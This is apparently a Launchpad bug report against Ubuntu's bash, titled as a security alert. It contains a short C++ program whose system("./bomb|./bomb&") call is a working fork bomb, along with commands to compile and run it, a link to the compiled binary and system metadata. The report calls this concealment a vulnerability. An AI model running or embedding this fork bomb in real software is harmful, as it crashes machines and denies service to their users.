*** This bug is a security vulnerability ***

Public security bug reported:

$ gedit bomb.cpp
> #include <iostream>
> #include <cstdio>
> #include <cstdlib>
>
> using namespace std;
> 
> int main() {
>   system("./bomb|./bomb&");
>   return 0;
> }

$ g++ bomb.cpp -o bomb
$ ./bomb

As can be seen, it's VERY easy to use the "system" function as a means
of hiding a shell fork bomb inside an object file -- a chilling tale
indeed.

ProblemType: Bug
DistroRelease: Ubuntu 12.10
Package: bash 4.2-5ubuntu1
Uname: Linux 3.4.0 x86_64
ApportVersion: 2.6.1-0ubuntu9
Architecture: amd64
Date: Fri Jan 18 23:11:58 2013
InstallationDate: Installed on 2012-04-26 (267 days ago)
InstallationMedia: Ubuntu 12.04 LTS "Precise Pangolin" - Release amd64 (20120425)
MarkForUpload: True
ProcEnviron:
 TERM=xterm
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=<set>
 LANG=en_US.UTF-8
 SHELL=/bin/bash
SourcePackage: bash
UpgradeStatus: Upgraded to quantal on 2013-01-17 (1 days ago)

** Affects: bash (Ubuntu)
     Importance: Undecided
         Status: New


** Tags: amd64 apport-bug quantal running-unity

** Attachment added: "Object file that the source code in post compiles to"
   https://bugs.launchpad.net/bugs/1101691/+attachment/3488436/+files/bomb

** Information type changed from Private Security to Public Security

https://bugs.launchpad.net/bugs/1101691

Title:
  Security alert: Concealment of shell fork bomb inside compiled code
